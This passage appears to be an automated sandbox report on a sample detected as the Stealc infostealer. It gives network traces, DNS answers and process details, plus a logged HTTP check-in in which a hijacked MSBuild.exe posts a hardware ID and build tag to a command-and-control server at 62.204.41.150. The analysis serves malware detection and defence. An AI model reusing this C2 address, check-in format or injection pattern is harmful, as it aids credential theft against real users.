Oct 7, 2024 18:46:23.568123102 CEST	443	49729	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.570571899 CEST	49733	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.570596933 CEST	443	49733	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.570759058 CEST	49733	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.570981979 CEST	49733	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.570995092 CEST	443	49733	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.571192026 CEST	49734	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.571202040 CEST	443	49734	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.571271896 CEST	49734	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.571417093 CEST	49734	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.571425915 CEST	443	49734	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.580358982 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.580424070 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.580471992 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.580746889 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.580756903 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.580773115 CEST	49730	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.580777884 CEST	443	49730	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.583758116 CEST	49735	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.583821058 CEST	443	49735	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.583895922 CEST	49735	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.584096909 CEST	49735	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.584125042 CEST	443	49735	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.586873055 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.586926937 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.586968899 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.587105989 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.587121964 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.587132931 CEST	49731	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.587140083 CEST	443	49731	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.589807034 CEST	49736	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.589829922 CEST	443	49736	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.589901924 CEST	49736	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.590050936 CEST	49736	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.590065002 CEST	443	49736	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.592736006 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.592788935 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.592830896 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.592981100 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.592993975 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.593005896 CEST	49728	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.593014002 CEST	443	49728	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.597059011 CEST	49737	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.597083092 CEST	443	49737	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.597138882 CEST	49737	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.597321033 CEST	49737	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.597332001 CEST	443	49737	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.684663057 CEST	443	49733	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.685039997 CEST	49738	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.685070992 CEST	443	49738	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.685137033 CEST	49738	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.685574055 CEST	49738	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.685584068 CEST	443	49738	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.686362028 CEST	443	49734	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.686614037 CEST	49739	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.686639071 CEST	443	49739	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.686698914 CEST	49739	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.686835051 CEST	49739	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.686847925 CEST	443	49739	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.688033104 CEST	443	49735	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.688234091 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.688266993 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.688321114 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.688524961 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.688539028 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.689304113 CEST	443	49736	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.689486980 CEST	49741	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.689512968 CEST	443	49741	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.689564943 CEST	49741	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.689666033 CEST	49741	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.689678907 CEST	443	49741	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.689965963 CEST	443	49737	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.690121889 CEST	49742	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.690130949 CEST	443	49742	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.690179110 CEST	49742	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.690308094 CEST	49742	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.690316916 CEST	443	49742	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.701337099 CEST	443	49738	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.702164888 CEST	443	49739	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.703905106 CEST	49743	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.703946114 CEST	443	49743	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.704027891 CEST	49743	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.704931974 CEST	49744	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.704962015 CEST	443	49744	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.705061913 CEST	49744	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.705112934 CEST	49743	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.705132961 CEST	443	49743	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.705338001 CEST	49744	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.705357075 CEST	443	49744	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.706461906 CEST	443	49742	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.708029032 CEST	49745	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.708125114 CEST	443	49745	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.708208084 CEST	49745	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.708338022 CEST	49745	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.708374023 CEST	443	49745	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.723351002 CEST	443	49744	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.723583937 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.723609924 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.723674059 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.723721027 CEST	443	49741	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.723777056 CEST	49741	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.723917961 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.723942995 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.723948002 CEST	49741	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.723964930 CEST	443	49741	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.725573063 CEST	49747	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.725608110 CEST	443	49747	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.725683928 CEST	49747	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.725964069 CEST	49747	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.725975990 CEST	443	49747	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.726725101 CEST	443	49745	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.726893902 CEST	49748	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.726927996 CEST	443	49748	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.726982117 CEST	49748	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.727076054 CEST	49748	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.727089882 CEST	443	49748	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.732773066 CEST	443	49743	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.732851982 CEST	49743	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.732882977 CEST	49743	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.732896090 CEST	443	49743	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.733040094 CEST	49749	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.733077049 CEST	443	49749	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.733122110 CEST	49749	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.733261108 CEST	49749	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.733278036 CEST	443	49749	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.738272905 CEST	443	49747	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.738570929 CEST	49750	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.738605976 CEST	443	49750	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.738665104 CEST	49750	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.738975048 CEST	49750	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.738991976 CEST	443	49750	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.739659071 CEST	443	49748	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.741708994 CEST	49751	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.741719007 CEST	443	49751	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.741789103 CEST	49751	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.741965055 CEST	49751	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.741976976 CEST	443	49751	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.750180006 CEST	443	49749	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.752835989 CEST	443	49750	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.755099058 CEST	443	49751	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.755333900 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.755348921 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:23.755415916 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.755815029 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:23.755827904 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.476762056 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.476861000 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.478132963 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.478142977 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.478368044 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.479155064 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.503094912 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.503170967 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.504473925 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.504486084 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.504745007 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.505143881 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.505227089 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.505873919 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.506270885 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.506298065 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.506593943 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.507631063 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.523401976 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.551410913 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.551443100 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.595247030 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.595314980 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.595407009 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.595583916 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.595606089 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.595618010 CEST	49740	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.595623016 CEST	443	49740	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630413055 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630479097 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630620003 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.630796909 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.630816936 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630852938 CEST	49752	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.630860090 CEST	443	49752	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630914927 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.630980968 CEST	443	49746	13.107.246.64	192.168.2.5
Oct 7, 2024 18:46:24.633260012 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.633260012 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.633260012 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.933927059 CEST	49746	443	192.168.2.5	13.107.246.64
Oct 7, 2024 18:46:24.934021950 CEST	443	49746	13.107.246.64	192.168.2.5

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 18:46:08.986644983 CEST	1.1.1.1	192.168.2.5	0x198	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:08.986644983 CEST	1.1.1.1	192.168.2.5	0x198	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:09.614890099 CEST	1.1.1.1	192.168.2.5	0x9d35	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:46:09.614890099 CEST	1.1.1.1	192.168.2.5	0x9d35	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:19.230451107 CEST	1.1.1.1	192.168.2.5	0xb329	No error (0)	shed.dual-low.s-part-0036.t-0009.t-msedge.net	s-part-0036.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:46:19.230451107 CEST	1.1.1.1	192.168.2.5	0xb329	No error (0)	s-part-0036.t-0009.t-msedge.net		13.107.246.64	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

62.204.41.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	62.204.41.150	80	4616	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 18:46:05.668461084 CEST	88	OUT	GET / HTTP/1.1 Host: 62.204.41.150 Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 18:46:06.424277067 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 16:46:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 7, 2024 18:46:06.468998909 CEST	419	OUT	POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG Host: 62.204.41.150 Content-Length: 219 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--
Oct 7, 2024 18:46:07.014967918 CEST	210	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 16:46:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	12:46:04
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\1f13Cs1ogc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1f13Cs1ogc.exe"
Imagebase:	0xfe0000
File size:	505'344 bytes
MD5 hash:	BE961E1299E54C9A50C773DB0DC3696C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:46:04
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xd0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:46:04
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x4d0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:46:04
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x7d0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:46:05
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
Imagebase:	0x80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.1%
Total number of Nodes:	197
Total number of Limit Nodes:	4

Executed Functions

Function 00FE2021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(0105A6D8,?,00000040,?), ref: 00FE2738

Strings

a, xrefs: 00FE2296
', xrefs: 00FE2718
S, xrefs: 00FE206A

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: '$S$a
API String ID: 544645111-1060379873
Opcode ID: 5309abc772c5609ad207f6dc6a5fbb16bdb8486e620e5bb072a62e08bd8ab2d1
Instruction ID: ec6f992b0797af538a0e9a2db8ad35627cc23247873d89307d3018635e25ea71
Opcode Fuzzy Hash: 5309abc772c5609ad207f6dc6a5fbb16bdb8486e620e5bb072a62e08bd8ab2d1
Instruction Fuzzy Hash: 87F1CF27D34E5B06E748643A8D522E5A54EE7EA330F914333BE639B3F4F3690941B285

Function 00FF8E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00FF8FDD

Part of subcall function 00FF3A83: HeapAlloc.KERNEL32(00000000,00FFA1AA,?,?,00FFA1AA,00000220,?,?,?), ref: 00FF3AB5

__freea.LIBCMT ref: 00FF8FF2
__freea.LIBCMT ref: 00FF9002

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: e7f1596bbb5d7ab4219e7bb61e4122d25e9dc040928cbad9bc4846da0a972772
Instruction ID: 7588485c16a472d9b10dc723da6733f9edb21086708be601152a69292c831a27
Opcode Fuzzy Hash: e7f1596bbb5d7ab4219e7bb61e4122d25e9dc040928cbad9bc4846da0a972772
Instruction Fuzzy Hash: 4351BB72A0021E6FEF219F65CC41EBB36AAEF447A0B150129FE14D71A0EF75CD51A760

Function 00FFA3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF9ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00FF9F01

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00FFA1ED,?,00000000,?,?,?), ref: 00FFA407
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FFA1ED,?,00000000,?,?,?), ref: 00FFA449

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 6aa472e2175474f5842b6b1bac8def583ca3fb1204f5ea971a896e0ff35a0140
Instruction ID: f661c2984bfae50b2ac965a7b8505934aa28b031019b53930be1dad181be4205
Opcode Fuzzy Hash: 6aa472e2175474f5842b6b1bac8def583ca3fb1204f5ea971a896e0ff35a0140
Instruction Fuzzy Hash: 695127B1D002498FDB21CF75C8846BABBF5EF44310F18406ED28ACB271E7B99945EB52

Function 00FF6368 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00FF8F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00FF639C
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00FF8F1C,?,?,00000000,?,00000000), ref: 00FF63BA

Memory Dump Source

